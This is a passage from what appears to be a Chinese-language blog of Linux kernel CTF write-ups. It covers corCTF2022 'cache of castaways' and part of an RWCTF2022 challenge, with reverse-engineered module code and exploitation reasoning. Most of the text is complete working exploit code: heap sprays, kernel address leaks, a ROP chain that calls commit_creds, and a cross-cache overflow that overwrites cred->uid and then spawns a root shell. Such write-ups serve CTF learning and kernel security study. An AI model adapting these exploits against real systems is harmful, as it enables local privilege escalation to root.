size_t kernel_offset_query (size_t kernel_text_leak) { if (!is_kernel_text_addr(kernel_text_leak)) { return INVALID_KERNEL_OFFSET; } for (int i = 0 ; i < sizeof (kernel_addr_list) / sizeof (kernel_addr_list[0 ]); i++) { if (!((kernel_text_leak ^ kernel_addr_list[i]) & 0xFFF ) && (kernel_text_leak - kernel_addr_list[i]) % 0x100000 == 0 ) { return kernel_text_leak - kernel_addr_list[i]; } } printf ("[-] unknown kernel addr: %#lx\n" , kernel_text_leak); return INVALID_KERNEL_OFFSET; } size_t search_kernel_offset (void *buf, int len) { size_t *search_buf = buf; for (int i = 0 ; i < len / 8 ; i++) { size_t kernel_offset = kernel_offset_query(search_buf[i]); if (kernel_offset != INVALID_KERNEL_OFFSET) { printf ("[+] kernel leak addr: %#lx\n" , search_buf[i]); printf ("[+] kernel offset: %#lx\n" , kernel_offset); return kernel_offset; } } return INVALID_KERNEL_OFFSET; } size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } typedef struct { int nfds, timer; } poll_args; struct poll_list { struct poll_list *next ; int len; struct pollfd entries []; }; pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;size_t poll_threads, poll_cnt;void *alloc_poll_list (void *args) { int nfds = ((poll_args *) args)->nfds; int timer = ((poll_args *) args)->timer; struct pollfd *pfds = calloc (nfds, sizeof (struct pollfd)); for (int i = 0 ; i < nfds; i++) { pfds[i].fd = open("/etc/passwd" , O_RDONLY); pfds[i].events = POLLERR; } bind_core(true , true ); pthread_mutex_lock(&mutex); poll_threads++; pthread_mutex_unlock(&mutex); poll(pfds, nfds, timer); bind_core(false , true ); pthread_mutex_lock(&mutex); poll_threads--; pthread_mutex_unlock(&mutex); } #define N_STACK_PPS 30 #define POLL_NUM 0x1000 pthread_t poll_tid[POLL_NUM];void create_poll_thread (size_t size, int timer) { poll_args *args = calloc (1 , sizeof (poll_args)); args->nfds = (size - (size + PAGE_SIZE - 1 ) / PAGE_SIZE * sizeof (struct poll_list)) / sizeof (struct pollfd) + N_STACK_PPS; args->timer = timer; pthread_create(&poll_tid[poll_cnt++], 0 , alloc_poll_list, args); } void wait_poll_start () { while (poll_threads != poll_cnt); } void join_poll_threads (void (*confuse)(void *), void *confuse_args) { for (int i = 0 ; i < poll_threads; i++) { pthread_join(poll_tid[i], NULL ); if (confuse != NULL ) { confuse(confuse_args); } } poll_cnt = poll_threads = 0 ; } struct callback_head { struct callback_head *next ; void (*func)(struct callback_head *head); } __attribute__((aligned(sizeof (void *)))); #define rcu_head callback_head #define __aligned(x) __attribute__((__aligned__(x))) typedef unsigned long long u64;struct user_key_payload { struct rcu_head rcu ; unsigned short datalen; char data[0 ] __aligned(__alignof__(u64)); }; #define KEY_NUM 199 int key_id[KEY_NUM];int key_alloc (int id, void *payload, int payload_len) { char description[0x10 ] = {}; sprintf (description, "%d" , id); return key_id[id] = syscall(__NR_add_key, "user" , description, payload, payload_len - sizeof (struct user_key_payload), KEY_SPEC_PROCESS_KEYRING); } int key_update (int id, void *payload, size_t plen) { return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen); } int key_read (int id, void *bufer, size_t buflen) { return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen); } int key_revoke (int id) { return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0 , 0 , 0 ); } int key_unlink (int id) { return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING); } struct list_head { struct list_head *next , *prev ; }; struct tty_file_private { struct tty_struct *tty ; struct file *file ; struct list_head list ; }; struct page ;struct pipe_inode_info ;struct pipe_buf_operations ;struct pipe_bufer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private; }; struct pipe_buf_operations { int (*confirm)(struct pipe_inode_info *, struct pipe_bufer *); void (*release)(struct pipe_inode_info *, struct pipe_bufer *); int (*try_steal)(struct pipe_inode_info *, struct pipe_bufer *); int (*get)(struct pipe_inode_info *, struct pipe_bufer *); }; void get_shell (void ) { char *args[] = {"/bin/bash" , "-i" , NULL }; execve(args[0 ], args, NULL ); } #define SEQ_NUM (2048 + 128) #define TTY_NUM 72 #define PIPE_NUM 1024 int cormon_fd;char buf[0x20000 ];void seq_confuse (void *args) { open("/proc/self/stat" , O_RDONLY); } size_t push_rsi_pop_rsp_ret = 0xFFFFFFFF817AD641 ;size_t pop_rdi_ret = 0xffffffff8116926d ;size_t init_cred = 0xFFFFFFFF8245A960 ;size_t commit_creds = 0xFFFFFFFF810EBA40 ;size_t pop_r14_pop_r15_ret = 0xffffffff81001615 ;size_t find_task_by_vpid = 0xFFFFFFFF810E4FC0 ;size_t init_fs = 0xFFFFFFFF82589740 ;size_t pop_rcx_ret = 0xffffffff8101f5fc ;size_t add_rax_rcx_ret = 0xffffffff8102396f ;size_t mov_mmrax_rbx_pop_rbx_ret = 0xffffffff817e1d6d ;size_t pop_rbx_ret = 0xffffffff811bce34 ;size_t swapgs_ret = 0xffffffff81a05418 ;size_t iretq = 0xffffffff81c00f97 ;int main () { bind_core(true , false ); save_status(); signal(SIGSEGV, (void *) get_shell); cormon_fd = open("/proc_rw/cormon" , O_RDWR); if (cormon_fd < 0 ) { perror("[-] failed to open cormon." ); exit (-1 ); } size_t kernel_offset; int target_key; puts ("[*] Saturating kmalloc-32 partial slabs..." ); int seq_fd[SEQ_NUM]; for (int i = 0 ; i < SEQ_NUM; i++) { seq_fd[i] = open("/proc/self/stat" , O_RDONLY); if (seq_fd[i] < 0 ) { perror("[-] failed to open stat." ); exit (-1 ); } if (i == 2048 ) { puts ("[*] Spraying user keys in kmalloc-32..." ); for (int j = 0 ; j < KEY_NUM; j++) { setxattr("/tmp/exp" , "aaaaaa" , buf, 32 , XATTR_CREATE); key_alloc(j, buf, 32 ); if (j == 72 ) { bind_core(false , false ); puts ("[*] Creating poll threads..." ); for (int k = 0 ; k < 14 ; k++) { create_poll_thread( PAGE_SIZE + sizeof (struct poll_list) + sizeof (struct pollfd), 3000 ); } bind_core(true , false ); wait_poll_start(); } } puts ("[*] Corrupting poll_list next pointer..." ); write(cormon_fd, buf, PAGE_SIZE); puts ("[*] Triggering arbitrary free..." ); join_poll_threads(seq_confuse, NULL ); puts ("[*] Overwriting user key size / Spraying seq_operations structures..." ); } } puts ("[*] Leaking kernel pointer..." ); for (int i = 0 ; i < KEY_NUM; i++) { int len = key_read(i, buf, sizeof (buf)); kernel_offset = search_kernel_offset(buf, len); if (kernel_offset != INVALID_KERNEL_OFFSET) { qword_dump("dump leak memory" , buf, 0x1000 ); target_key = i; break ; } } if (kernel_offset == INVALID_KERNEL_OFFSET) { puts ("[-] failed to leak kernel offset,try again." ); exit (-1 ); } push_rsi_pop_rsp_ret += kernel_offset; pop_rdi_ret += kernel_offset; init_cred += kernel_offset; commit_creds += kernel_offset; pop_r14_pop_r15_ret += kernel_offset; find_task_by_vpid += kernel_offset; init_fs += kernel_offset; pop_rcx_ret += kernel_offset; add_rax_rcx_ret += kernel_offset; mov_mmrax_rbx_pop_rbx_ret += kernel_offset; pop_rbx_ret += kernel_offset; swapgs_ret += kernel_offset; iretq += kernel_offset; puts ("[*] Freeing user keys..." ); for (int i = 0 ; i < KEY_NUM; i++) { if (i != target_key) { key_unlink(i); } } sleep(1 ); puts ("[*] Spraying tty_file_private / tty_struct structures..." ); int tty_fd[TTY_NUM]; for (int i = 0 ; i < TTY_NUM; i++) { tty_fd[i] = open("/dev/ptmx" , O_RDWR | O_NOCTTY); if (tty_fd[i] < 0 ) { perror("[-] failed to open ptmx" ); } } puts ("[*] Leaking heap pointer..." ); size_t target_object = -1 ; int len = key_read(target_key, buf, sizeof (buf)); qword_dump("dump leak memory" , buf, 0x1000 ); for (int i = 0 ; i < len; i += 8 ) { struct tty_file_private *head = (void *) &buf[i]; if (is_dir_mapping_addr((size_t ) head->tty) && !(((size_t ) head->tty) & 0xFF ) && head->list .next == head->list .prev && head->list .prev != NULL ) { qword_dump("leak tty_struct addr from tty_file_private" , &buf[i], sizeof (struct tty_file_private)); target_object = (size_t ) head->tty; printf ("[+] tty_struct addr: %p\n" , target_object); break ; } } if (target_object == -1 ) { puts ("[-] failed to leak tty_struct addr." ); exit (-1 ); } puts ("[*] Freeing seq_operation structures..." ); for (int i = 2048 ; i < SEQ_NUM; i++) { close(seq_fd[i]); } bind_core(false , false ); puts ("[*] Creating poll threads..." ); for (int i = 0 ; i < 192 ; i++) { create_poll_thread(sizeof (struct poll_list) + sizeof (struct pollfd), 3000 ); } bind_core(true , false ); wait_poll_start(); puts ("[*] Freeing corrupted key..." ); key_unlink(target_key); sleep(1 ); puts ("[*] Overwriting poll_list next pointer..." ); char key[32 ] = {}; *(size_t *) &buf[0 ] = target_object - 0x18 ; for (int i = 0 ; i < KEY_NUM; i++) { setxattr("/tmp/exp" , "aaaaaa" , buf, 32 , XATTR_CREATE); key_alloc(i, key, 32 ); } puts ("[*] Freeing tty_struct structures..." ); for (int i = 0 ; i < TTY_NUM; i++) { close(tty_fd[i]); } sleep(1 ); int pipe_fd[PIPE_NUM][2 ]; puts ("[*] Spraying pipe_bufer structures..." ); for (int i = 0 ; i < PIPE_NUM; i++) { pipe(pipe_fd[i]); write(pipe_fd[i][1 ], "aaaaaa" , 6 ); } puts ("[*] Triggering arbitrary free..." ); join_poll_threads(NULL , NULL ); ((struct pipe_bufer *) buf)->ops = (void *) (target_object + 0x300 ); ((struct pipe_buf_operations *) &buf[0x300 ])->release = (void *) push_rsi_pop_rsp_ret; size_t *rop = (size_t *) buf; *rop++ = pop_r14_pop_r15_ret; rop++; rop++; *rop++ = pop_rdi_ret; *rop++ = init_cred; *rop++ = commit_creds; *rop++ = pop_rdi_ret; *rop++ = getpid(); *rop++ = find_task_by_vpid; *rop++ = pop_rcx_ret; *rop++ = 0x6e0 ; *rop++ = add_rax_rcx_ret; *rop++ = pop_rbx_ret; *rop++ = init_fs; *rop++ = mov_mmrax_rbx_pop_rbx_ret; rop++; *rop++ = swapgs_ret; *rop++ = iretq; *rop++ = (uint64_t ) get_shell; *rop++ = user_cs; *rop++ = user_rflags; *rop++ = user_sp; *rop++ = user_ss; puts ("[*] Spraying ROP chain..." ); for (int i = 0 ; i < 31 ; i++) { key_alloc(i, buf, 1024 ); } puts ("[*] Hijacking control flow..." ); for (int i = 0 ; i < PIPE_NUM; i++) { close(pipe_fd[i][0 ]); close(pipe_fd[i][1 ]); } sleep(5 ); return 0 ; }
多试几次还是可以成功的。
corCTF2022 cache of castways 题目分析 保护机制
题目给了kconfig文件,SMAP, SMEP, KPTI, KASLR 及常用的保护机制,内核版本是 5.18.3 所以禁用了 msg_msg。
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/sh exec qemu-system-x86_64 \ -m 4096M \ -nographic \ -kernel bzImage \ -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \ -netdev user,id =net \ -device e1000, netdev=net \ -no-reboot \ -monitor /dev/null \ -cpu qemu64,+smep,+smap \ -initrd initramfs.cpio
逆向分析
在启动脚本里加载了一个名为 cache_of_castaway.ko 的 LKM,按惯例丢进 IDA,在模块初始化时注册了设备并创建了一个 kmem_cache,分配的 object 的 size 为 512,创建 flag 为 SLAB_ACCOUNT | SLAB_PANIC,同时开启了 CONFIG_MEMCG_KMEM=y,这意味着这是一个独立的 kmem_cache :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 __int64 init_module () { __int64 result; castaway_dev = 255 ; qword_8A8 = (__int64)"castaway" ; qword_8B0 = (__int64)&castaway_fops; _mutex_init(&castaway_lock, "&castaway_lock" , &_key_28999); if ( !(unsigned int )misc_register(&castaway_dev) && (castaway_arr = kmem_cache_alloc(kmalloc_caches[12 ], 3520LL )) != 0 && (castaway_cachep = kmem_cache_create("castaway_cache" , 0x200 LL, 1LL , 0x4040000 LL, 0LL )) != 0 ) { result = init_castaway_driver_cold(); } else { result = 0xFFFFFFFF LL; } return result; }
设备只定义了一个 ioctl,其中包含分配与编辑堆块的功能且都有锁,最多可以分配 400 个 object,没有释放功能:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 __int64 __fastcall castaway_ioctl (__int64 a1, int a2, __int64 a3) { __int64 v3; _QWORD *v5; unsigned __int64 v6[6 ]; v6[3 ] = __readgsqword(0x28 u); if ( a2 != 0xCAFEBABE ) { if ( copy_from_user(v6, a3, 24LL ) ) return -1LL ; mutex_lock(&castaway_lock); if ( a2 == 0xF00DBABE ) v3 = castaway_edit(v6[0 ], v6[1 ], v6[2 ]); else v3 = -1LL ; LABEL_5: mutex_unlock(&castaway_lock); return v3; } mutex_lock(&castaway_lock); v3 = castaway_ctr; if ( castaway_ctr <= 399 ) { ++castaway_ctr; v5 = (_QWORD *)(castaway_arr + 8 * v3); *v5 = kmem_cache_alloc(castaway_cachep, 0x400DC0 LL); if ( *(_QWORD *)(castaway_arr + 8 * v3) ) goto LABEL_5; } return ((__int64 (*)(void ))castaway_ioctl_cold)(); }
漏洞便存在于编辑堆块的 castaway_edit() 当中,在拷贝数据时会故意从 object + 6 的地方开始拷贝,从而存在一个 6 字节的溢出,这里因为是先拷贝到内核栈上再进行内核空间中的拷贝所以不会触发 hardened usercopy 的检查:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 __int64 __fastcall castaway_edit (unsigned __int64 a1, size_t a2, __int64 a3) { char src[512 ]; unsigned __int64 v6; v6 = __readgsqword(0x28 u); if ( a1 > 0x18F ) return castaway_edit_cold(); if ( !*(_QWORD *)(castaway_arr + 8 * a1) ) return castaway_edit_cold(); if ( a2 > 0x200 ) return castaway_edit_cold(); _check_object_size(src, a2, 0LL ); if ( copy_from_user(src, a3, a2) ) return castaway_edit_cold(); memcpy ((void *)(*(_QWORD *)(castaway_arr + 8 * a1) + 6LL ), src, a2); return a2; }
编辑堆块时我们应当向内核中传入如下结构:
1 2 3 4 5 struct request { int64_t index; size_t size; void *buf; };
利用思路 由于我们的漏洞对象位于独立的 kmem_cache 中,因此其不会与内核中的其他常用结构体的分配混用,我们无法直接通过 slub 层的堆喷 + 堆风水来溢出到其他结构体来进行下一步利用;同时由于 slub 并不会像 glibc 的ptmalloc2 那样在每个 object 开头都有个存储数据的 header,而是将 next 指针放在一个随机的位置,我们很难直接溢出到下一个 object 的 next 域,由于 hardened freelist 的存在就算我们能溢出到下一个相邻 object 的 next 域也没法构造出一个合法的指针;而在我们的 slub 页面相邻的页面上的数据对我们来说也是未知的,直接溢出的话我们并不知道能够溢出到什么页面上。
让我们把目光重新放到 slub allocator 上,当 freelist page 已经耗空且 partial 链表也为空时(或者 kmem_cache 刚刚创建后进行第一次分配时),其会向 buddy system 申请页面:
buddy system 的基本原理就是以 2 的 order 次幂张内存页作为分配粒度,相同 order 间空闲页面构成双向链表,当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半,其中一半挂回当前请求 order 链表,另一半返还给上层调用者;下图为以 order 2 为例的 buddy system 页面分配基本原理:
我们不难想到的是:从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的 ,若其中的一份被我们的 kmem_cache 取走,而另一份被用于分配其他内核结构体的 kmem_cache 取走,则我们便有可能溢出到其他的内核结构体上 ——这便是 **cross-cache overflow**。
具体的溢出对象也并不难想——6个字节刚好足够我们溢出到 cred 结构体的 uid 字段,完成提权,那么如何溢出到我们想要提权的进程的 cred 结构体呢?我们只需要先 fork() 堆喷 cred 耗尽 cred_jar 中 object,让其向 buddy system 请求新的页面即可,我们还需要先堆喷消耗 buddy system 中原有的页面,之后我们再分配 cred 和题目 object,两者便有较大概率相邻。
cred 的大小为 192,cred_jar 向 buddy system 单次请求的页面数量为 1,足够分配 21 个 cred,因此我们不需要堆喷太多 cred 便能耗尽 cred_jar,不过 fork() 在执行过程中会产生很多的”噪声“(即额外分配一些我们不需要的结构体,从而影响页布局),因此这里我们改用 clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND)。
使用 setsockopt() 进行页喷射的方法:当我们创建一个 protocol 为 PF_PACKET 的 socket 之后,先调用 setsockopt() 将 PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:
1 2 3 4 5 __sys_setsockopt() sock->ops->setsockopt() packet_setsockopt() packet_set_ring() alloc_pg_vec()
在 alloc_pg_vec() 中会创建一个 pgv 结构体,用以分配 tp_block_nr 份 2 order 张内存页,其中 order 由 tp_block_size 决定:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 static struct pgv *alloc_pg_vec (struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec ; int i; pg_vec = kcalloc(block_nr, sizeof (struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0 ; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; out_free_pgvec: free_pg_vec(pg_vec, order, block_nr); pg_vec = NULL ; goto out; }
在 alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求:
1 2 3 4 5 6 7 8 9 10 11 static char *alloc_one_pg_vec_page (unsigned long order) { char *buffer; gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP | __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY; buffer = (char *) __get_free_pages(gfp_flags, order); if (buffer) return buffer; }
pgv 中的页面会在 socket 被关闭后释放,这也方便我们后续的页级堆风水,不过需要注意的是低权限用户无法使用该函数,但是我们可以通过开辟新的命名空间来绕过该限制。
这里需要注意的是我们提权的进程不应当和页喷射的进程在同一命名空间内 ,因为后者需要开辟新的命名空间,而我们应当在原本的命名空间完成提权,因此这里选择新开一个进程进行页喷射,并使用管道在主进程与喷射进程间通信。(如果你忘了这一步,就会得到一个 65534 的 uid 然后冥思苦想半天…)。
setsockopt() 也可以帮助我们完成页级堆风水 ,当我们耗尽 buddy system 中的 low order pages 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt() 便相当于获取到了一块近乎物理连续的内存 (为什么是”近乎连续“是因为大量的 setsockopt() 流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面)
本题环境中题目的 kmem_cache 单次会向 buddy system 请求一张内存页,而由于 buddy system 遵循 LIFO,因此我们可以:
先分配大量的单张内存页,耗尽 buddy 中的 low-order pages。
间隔一张内存页释放掉部分单张内存页,之后堆喷 cred,这样便有几率获取到我们释放的单张内存页。
释放掉之前的间隔内存页,调用漏洞函数分配堆块,这样便有几率获取到我们释放的间隔内存页。
利用模块中漏洞进行越界写,篡改 cred->uid ,完成提权。
我们的子进程需要轮询等待自己的 uid 变为 root,这里选择用一个新的管道在主进程与子进程间通信,当子进程从管道中读出1字节时便开始检查自己是否成功提权,若未提权则直接 sleep 即可。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <stdint.h> #include <string.h> #include <sched.h> #include <time.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #define PGV_CRED_START (PGV_PAGE_NUM / 2) #define CRED_SPRAY_NUM 514 #define VUL_OBJ_NUM 400 #define VUL_OBJ_SIZE 512 #define VUL_OBJ_PER_SLUB 8 #define VUL_OBJ_SLUB_NUM (VUL_OBJ_NUM / VUL_OBJ_PER_SLUB) struct castaway_request { int64_t index; size_t size; void *buf; }; int dev_fd;void err_exit (char *msg) { printf ("\033[31m\033[1m[x] Error: %s\033[0m\n" , msg); exit (EXIT_FAILURE); } void alloc (void ) { ioctl(dev_fd, 0xCAFEBABE ); } void edit (int64_t index, size_t size, void *buf) { struct castaway_request r = { .index = index, .size = size, .buf = buf }; ioctl(dev_fd, 0xF00DBABE , &r); } char child_pipe_buf[1 ];int check_root_pipe[2 ];char bin_sh_str[] = "/bin/sh" ;char *shell_args[] = {bin_sh_str, NULL };struct timespec timer = { .tv_sec = 100000000 , .tv_nsec = 0 , }; int waiting_for_root_fn (void *args) { __asm__ volatile ( " lea rax, [check_root_pipe]; " " mov edi, dword ptr [rax]; " " mov rsi, child_pipe_buf; " " mov edx, 1; " " xor eax, eax; " " syscall; " " mov eax, 102; " " syscall; " " cmp eax, 0; " " jne failed; " " lea rdi, [bin_sh_str]; " " lea rsi, [shell_args]; " " xor edx, edx; " " mov eax, 59; " " syscall; " "failed: " " lea rdi, [timer]; " " xor esi, esi; " " mov eax, 35; " " syscall; " ) ; return 0 ; } __attribute__((naked)) long simple_clone (int flags, int (*fn)(void *)) { __asm__ volatile ( " mov r15, rsi; " " xor esi, esi; " " xor edx, edx; " " xor r10d, r10d; " " xor r8d, r8d; " " xor r9d, r9d; " " mov eax, 56; " " syscall; " " cmp eax, 0; " " je child_fn; " " ret; " "child_fn: " " jmp r15; " ) ;} void unshare_setup (void ) { char edit[0x100 ]; int tmp_fd; unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET); tmp_fd = open("/proc/self/setgroups" , O_WRONLY); write(tmp_fd, "deny" , strlen ("deny" )); close(tmp_fd); tmp_fd = open("/proc/self/uid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getuid()); write(tmp_fd, edit, strlen (edit)); close(tmp_fd); tmp_fd = open("/proc/self/gid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getgid()); write(tmp_fd, edit, strlen (edit)); close(tmp_fd); } #define PGV_PAGE_NUM 1000 #define PACKET_VERSION 10 #define PACKET_TX_RING 13 struct tpacket_req { unsigned int tp_block_size; unsigned int tp_block_nr; unsigned int tp_frame_size; unsigned int tp_frame_nr; }; struct pgv_page_request { int idx; int cmd; unsigned int size; unsigned int nr; }; enum { CMD_ALLOC_PAGE, CMD_FREE_PAGE, CMD_EXIT, }; enum tpacket_versions { TPACKET_V1, TPACKET_V2, TPACKET_V3, }; int cmd_pipe_req[2 ], cmd_pipe_reply[2 ];int create_socket_and_alloc_pages (unsigned int size, unsigned int nr) { struct tpacket_req req ; int socket_fd, version; int ret; socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); if (socket_fd < 0 ) { printf ("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n" ); ret = socket_fd; goto err_out; } version = TPACKET_V1; ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof (version)); if (ret < 0 ) { printf ("[x] failed at setsockopt(PACKET_VERSION)\n" ); goto err_setsockopt; } memset (&req, 0 , sizeof (req)); req.tp_block_size = size; req.tp_block_nr = nr; req.tp_frame_size = 0x1000 ; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof (req)); if (ret < 0 ) { printf ("[x] failed at setsockopt(PACKET_TX_RING)\n" ); goto err_setsockopt; } return socket_fd; err_setsockopt: close(socket_fd); err_out: return ret; } int alloc_page (int idx, unsigned int size, unsigned int nr) { struct pgv_page_request req = { .idx = idx, .cmd = CMD_ALLOC_PAGE, .size = size, .nr = nr, }; int ret; write(cmd_pipe_req[1 ], &req, sizeof (struct pgv_page_request)); read(cmd_pipe_reply[0 ], &ret, sizeof (ret)); return ret; } int free_page (int idx) { struct pgv_page_request req = { .idx = idx, .cmd = CMD_FREE_PAGE, }; int ret; write(cmd_pipe_req[1 ], &req, sizeof (req)); read(cmd_pipe_reply[0 ], &ret, sizeof (ret)); return ret; } void spray_cmd_handler (void ) { struct pgv_page_request req ; int socket_fd[PGV_PAGE_NUM]; int ret; unshare_setup(); do { read(cmd_pipe_req[0 ], &req, sizeof (req)); if (req.cmd == CMD_ALLOC_PAGE) { ret = create_socket_and_alloc_pages(req.size, req.nr); socket_fd[req.idx] = ret; } else if (req.cmd == CMD_FREE_PAGE) { ret = close(socket_fd[req.idx]); } else { printf ("[x] invalid request: %d\n" , req.cmd); } write(cmd_pipe_reply[1 ], &ret, sizeof (ret)); } while (req.cmd != CMD_EXIT); } void prepare_pgv_system (void ) { pipe(cmd_pipe_req); pipe(cmd_pipe_reply); if (!fork()) { spray_cmd_handler(); } } void bind_core (int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); } int main () { char buf[0x1000 ]; bind_core(0 ); dev_fd = open("/dev/castaway" , O_RDWR); if (dev_fd < 0 ) { err_exit("FAILED to open castaway device!" ); } prepare_pgv_system(); puts ("[*] spraying pgv pages..." ); for (int i = 0 ; i < PGV_PAGE_NUM; i++) { if (alloc_page(i, getpagesize(), 1 ) < 0 ) { printf ("[x] failed at no.%d socket\n" , i); err_exit("FAILED to spray pages via socket!" ); } } puts ("[*] freeing for cred pages..." ); for (int i = 1 ; i < PGV_PAGE_NUM; i += 2 ) { free_page(i); } puts ("[*] spraying cred..." ); pipe(check_root_pipe); for (int i = 0 ; i < CRED_SPRAY_NUM; i++) { if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, waiting_for_root_fn) < 0 ) { printf ("[x] failed at cloning %d child\n" , i); err_exit("FAILED to clone()!" ); } } puts ("[*] freeing for vulnerable pages..." ); for (int i = 0 ; i < PGV_PAGE_NUM; i += 2 ) { free_page(i); } puts ("[*] trigerring vulnerability in castaway kernel module..." ); memset (buf, 0 , sizeof (buf)); *(uint32_t *) &buf[VUL_OBJ_SIZE - 6 ] = 1 ; for (int i = 0 ; i < VUL_OBJ_NUM; i++) { alloc(); edit(i, VUL_OBJ_SIZE, buf); } puts ("[*] notifying child processes and waiting..." ); write(check_root_pipe[1 ], buf, CRED_SPRAY_NUM); sleep(100000000 ); return 0 ; }
D^3CTF2023 d3kcache 题目分析 利用思路 exp RWCTF2022 Digging into kernel 1 & 2 题目分析 start.sh
1 2 3 4 5 6 7 8 9 10 #!/bin/sh qemu-system-x86_64 \ -kernel bzImage \ -initrd rootfs.img \ -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \ -cpu kvm64,+smep,+smap \ -monitor null \ --nographic \ -s
逆向分析
1 2 3 4 5 6 7 8 9 10 11 int __cdecl xkmod_init () { kmem_cache *v0; printk(&unk_1E4); misc_register(&xkmod_device); v0 = (kmem_cache *)kmem_cache_create("lalala" , 192LL , 0LL , 0LL , 0LL ); buf = 0LL ; s = v0; return 0 ; }
1 2 3 4 int __fastcall xkmod_release (inode *inode, file *file) { return kmem_cache_free(s, buf); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 void __fastcall xkmod_ioctl (__int64 a1, int a2, __int64 a3) { __int64 data; unsigned int idx; unsigned int size; unsigned __int64 v6; v6 = __readgsqword(0x28 u); if ( a3 ) { copy_from_user(&data, a3, 0x10 LL); if ( a2 == 0x6666666 ) { if ( buf && size <= 0x50 && idx <= 0x70 ) { copy_from_user((char *)buf + (int )idx, data, (int )size); return ; } } else { if ( a2 != 0x7777777 ) { if ( a2 == 0x1111111 ) buf = (void *)kmem_cache_alloc(s, 0xCC0 LL); return ; } if ( buf && size <= 0x50 && idx <= 0x70 ) { ((void (__fastcall *)(__int64, char *, int ))copy_to_user)(data, (char *)buf + (int )idx, size); return ; } } xkmod_ioctl_cold(); } }
利用思路 关于内核基址获取,在内核堆基址(page_offset_base) + 0x9d000 处存放着 secondary_startup_64 函数的地址,而我们可以从 free object 的 next 指针获得一个堆上地址,从而去找堆的基址,之后分配到一个堆基址 + 0x9d000 处的 object 以泄露内核基址,这个地址前面刚好有一片为 NULL 的区域方便我们分配。
